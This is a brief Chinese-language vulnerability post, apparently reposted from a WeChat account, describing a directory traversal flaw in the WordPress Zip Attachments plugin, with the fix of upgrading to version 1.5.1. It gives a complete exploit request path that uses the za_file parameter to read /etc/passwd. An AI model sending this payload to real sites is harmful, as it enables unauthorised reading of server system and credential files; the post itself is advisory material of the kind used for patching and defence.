wordpress 任意文件下载漏洞

2023年10月25日22:05:09评论82 views字数 383阅读1分16秒阅读模式

#############################

免责声明：本文仅作收藏学习之用，亦希望大家以遵守《网络安全法》相关法律为前提，切勿用于非法犯罪活动，对于恶意使用造成的损失，和本人及作者无关。

##############################

WordPress 1.5.1 之前的 Zip 附件插件中的 download.php 中的目录遍历漏洞允许远程攻击者通过 za_file 参数中的 ..（点点）读取任意文件。

Zip 附件 <= 1.1.4 - 任意文件下载

/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd

修复方案：

升级：Zip 附件插件 1.5.1

原文始发于微信公众号（菜鸟小新）：wordpress 任意文件下载漏洞

本文由 admin 发表于 2023年10月25日22:05:09
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
wordpress 任意文件下载漏洞http://cn-sec.com/archives/2145033.html

更新! Windows安全基线核查加固助手V1.2.3